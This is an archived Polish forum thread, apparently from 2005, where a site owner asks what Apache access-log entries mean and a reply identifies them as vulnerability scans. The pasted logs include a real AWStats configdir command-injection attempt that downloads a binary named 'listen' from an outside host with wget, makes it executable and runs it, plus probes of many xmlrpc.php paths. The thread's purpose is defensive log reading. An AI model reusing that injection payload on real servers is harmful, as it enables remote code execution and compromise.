Mam taki banalny problem, co oznacza że jakieś ip "coś zrobiło" i np. jest taki wpis:
xx.xx.xxx.xx - - [18/Nov/2005:14:09:07 +0100] "GET / HTTP/1.0" 200 1282
Chodzi mi co oznacza get http 1.0, i te numery na końcu. Jeśli byłby ktoś miły mi wytłumaczyć, to z góry bardzo dziękuje!
Pełna wersja: acess.log w Apache'u
wyslanie do klienta przez apacza strony - użycie GET [przesył przez urla]
http://httpd.apache.org/docs/2.0/logs.html
... i wszystko jasne, google to taka wyszukiwarka internetowa, czasem sie przydaje
... i wszystko jasne, google to taka wyszukiwarka internetowa, czasem sie przydaje
OK. A jeśli z kilkunastu o ile nie z kilkudziesięciu (przeważnie z neo {83.29.xx}) ip jest tylko taka linijka "83.29.33.207 - - [19/Nov/2005:17:51:20 +0100] "GET / HTTP/1.0" 200 1282" - to co?
Jak ktoś wchodzi na moją stronkę to widzę bo jest get + jakiś tam plik. W dokumentacji z http://httpd.apache.org/docs/2.0/logs.html nie ma tam takiego przypadku. Podejrzewałem, że to jakieś roboty przeszukujące strony ale głównie ty były, tak jak pisałem, ip neostrady
Oto poniższy log:
Także nie wiem co oznaczają poniższe linijki:
po wejściu na stronę http://81.73.6.69 pisze "Media Free Knowledge" a host to host69-6.pool8173.interbusiness.it
//Edit: Ściąłem loga - odciążyłem baze
Jak ktoś wchodzi na moją stronkę to widzę bo jest get + jakiś tam plik. W dokumentacji z http://httpd.apache.org/docs/2.0/logs.html nie ma tam takiego przypadku. Podejrzewałem, że to jakieś roboty przeszukujące strony ale głównie ty były, tak jak pisałem, ip neostrady
Oto poniższy log:
Kod
83.29.66.94 - - [18/Nov/2005:17:50:10 +0100] "GET / HTTP/1.0" 200 1282
127.0.0.1 - - [18/Nov/2005:21:08:51 +0100] "GET /pagead/show_ads.js HTTP/1.1" 404 -
83.29.183.62 - - [19/Nov/2005:13:07:43 +0100] "GET /pliki/time/c3.gif HTTP/1.1" 304 -
127.0.0.1 - - [18/Nov/2005:21:08:51 +0100] "GET /pagead/show_ads.js HTTP/1.1" 404 -
83.29.183.62 - - [19/Nov/2005:13:07:43 +0100] "GET /pliki/time/c3.gif HTTP/1.1" 304 -
Także nie wiem co oznaczają poniższe linijki:
Kod
81.73.6.69 - - [19/Nov/2005:18:01:20 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd
%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e
%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:27 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd
%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e
%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:27 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
po wejściu na stronę http://81.73.6.69 pisze "Media Free Knowledge" a host to host69-6.pool8173.interbusiness.it
Kod
83.29.80.210 - - [19/Nov/2005:18:10:48 +0100] "GET / HTTP/1.0" 200 1282
83.29.235.11 - - [19/Nov/2005:18:23:39 +0100] "GET / HTTP/1.0" 200 1282
127.0.0.1 - - [19/Nov/2005:21:54:12 +0100] "GET /i.gif HTTP/1.1" 404 -
127.0.0.1 - - [19/Nov/2005:21:54:13 +0100] "GET /0.gif?tag=crackspl&j=y&srw=1024&srb=32&l= HTTP/1.1" 404 -
83.29.235.11 - - [19/Nov/2005:18:23:39 +0100] "GET / HTTP/1.0" 200 1282
127.0.0.1 - - [19/Nov/2005:21:54:12 +0100] "GET /i.gif HTTP/1.1" 404 -
127.0.0.1 - - [19/Nov/2005:21:54:13 +0100] "GET /0.gif?tag=crackspl&j=y&srw=1024&srb=32&l= HTTP/1.1" 404 -
//Edit: Ściąłem loga - odciążyłem baze
ostatnio był taki wyjątek w aplikacji która bodajże nazywała się phpAdsNew
problem był z xmlrpc, wielu ludzi się na to nadziało. dzięki tej dziurze, można było wywołać zdalnie np. skrypcik cgi.... ogólnie nie smaczne a u Ciebie te linijki
mówią nic więcej nic mnie jak to że ktoś próbował przesłać jakieś dane do pliczków xmlrpc.php - zapewne szukał luki
ciekawe też jest to:
ktoś chciał sprawdzić czy masz awstats i pobawić się w szpiega
Ogólnie: SCRIPT KIDDIES GO HOME
pzdr.
edit. : http://hacking.pl/5600
problem był z xmlrpc, wielu ludzi się na to nadziało. dzięki tej dziurze, można było wywołać zdalnie np. skrypcik cgi.... ogólnie nie smaczne a u Ciebie te linijki
Cytat("Coolmax")
81.73.6.69 - - [19/Nov/2005:18:01:27 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
mówią nic więcej nic mnie jak to że ktoś próbował przesłać jakieś dane do pliczków xmlrpc.php - zapewne szukał luki
ciekawe też jest to:
Cytat("Coolmax")
81.73.6.69 - - [19/Nov/2005:18:01:20 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
ktoś chciał sprawdzić czy masz awstats i pobawić się w szpiega
Ogólnie: SCRIPT KIDDIES GO HOME
pzdr.
edit. : http://hacking.pl/5600
Nie wie ktoś czym różni się na końcu liczba 1282 od 1494 i jak się one nazywają, bo spróbuje znaleźć jakąś dokumentację do nich (chyba że ktoś wie gdzie ona jest).
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.